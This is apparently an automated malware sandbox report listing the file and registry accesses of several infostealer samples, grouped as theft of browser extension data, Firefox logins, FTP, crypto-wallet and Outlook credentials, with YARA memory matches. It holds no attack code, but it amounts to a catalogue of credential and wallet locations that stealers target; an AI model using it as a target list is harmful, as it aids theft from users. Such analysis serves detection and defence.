Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA

Source: Yara match	File source: 0000002C.00000003.3495740575.0000000001549000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3395409746.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3725730938.000000000154F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3395777453.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3519315882.000000000154F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3489158557.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3489034650.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3004360942.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3659374635.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3659725440.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3616953743.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3551155681.000000000154F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3625699652.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3658829272.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
